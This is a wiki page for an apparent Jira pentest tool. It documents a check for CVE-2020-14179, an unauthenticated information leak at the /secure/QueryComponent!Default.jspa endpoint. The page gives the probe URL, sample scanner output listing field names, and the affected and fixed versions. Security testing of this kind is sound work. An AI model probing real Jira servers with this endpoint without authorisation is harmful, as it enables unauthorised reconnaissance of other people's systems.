CVE‐2020‐14179 - carnal0wnage/J-PWN GitHub Wiki
CVE-2020-14179
Category: [Info Disclosure]
[CG] In my testing this data hasn't been very interesting...YMMV worth pretty printing and manually reviewing
module name: check_cve_2020_14179
url: secure/QueryComponent!Default.jspa
+ CVE-2020-14179 Detected: Searchers Information [Review Manually]
URL: http://JIRASERVER/secure/QueryComponent!Default.jspa
Group Title: 详情 | Type: DETAILS
- Name: 项目
ID: project
Key: issue.field.project
Is Shown: True
- Name: 状态
ID: status
Key: issue.field.status
Is Shown: True
- Name: 创建者
ID: creator
Key: issue.field.creator
Is Shown: True
- Name: % 范围
ID: workratio
Key: issue.field.workratio
Is Shown: True
- Name: 查询
ID: text
Key: text
Is Shown: True
- Name: 状态
ID: customfield_10206
Key: com.atlassian.jira.plugin.system.customfieldtypes:version
Is Shown: False
Group Title: 日期 | Type: DATES
- Name: 创建日期
ID: created
Key: issue.field.created
Is Shown: True
- Name: 更新日期
ID: updated
Key: issue.field.updated
Is Shown: True
- Name: 解决日期
ID: resolutiondate
Key: issue.field.resolution.date
Is Shown: True
+ CVE-2020-14179 Detected: Values Information [Review Manually]
URL: http://JIRASERVER/secure/QueryComponent!Default.jspa
Field: project
- Name: 项目
- Valid Searcher: True
- Is Shown: True
- Edit HTML (First 100 chars):
...
Field: status
- Name: 状态
- Valid Searcher: True
- Is Shown: True
- Edit HTML (First 100 chars):
<div class="field-group aui-field-constants" >
...
Description
Summary
Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view
- custom field names
- custom SLA names
via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.
Affected versions:
version < 8.5.8
8.6.0 ≤ version < 8.11.1
Fixed versions:
8.5.8
8.11.1 and above, including 8.13.x